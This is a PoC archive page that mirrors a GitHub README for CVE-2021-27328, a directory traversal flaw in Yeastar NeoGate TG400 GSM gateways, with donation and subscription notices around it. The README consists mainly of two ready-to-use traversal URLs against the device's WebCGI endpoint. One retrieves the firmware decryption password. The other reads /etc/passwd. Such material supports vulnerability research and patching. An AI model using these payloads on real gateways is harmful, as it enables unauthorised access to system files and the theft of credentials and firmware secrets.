Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-27328 PoC — Yeastar NeoGate TG400 路径遍历漏洞

Source
https://github.com/SQSamir/CVE-2021-27328
Associated Vulnerability
Title:Yeastar NeoGate TG400 路径遍历漏洞 (CVE-2021-27328)
Description:Yeastar NeoGate TG400 91.3.0.3 devices are affected by Directory Traversal. An authenticated user can decrypt firmware and can read sensitive information, such as a password or decryption key.
Readme
# Path Traversal on Yeastar TG400 GSM Gateway - 91.3.0.3




This is a Proof of Concept for CVE-2021-27328

## Example
* to get  firmware decrypting password

```
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect
```
* to get /etc/paswd

```
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd
```
File Snapshot

 [4.0K]  /data/pocs/f4c8dd17939b6fd0db984b8e29b32440804e36d7
├── [ 364]  README.md
├── [147K]  ys_passwd.png
└── [215K]  ys_zippass.png

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →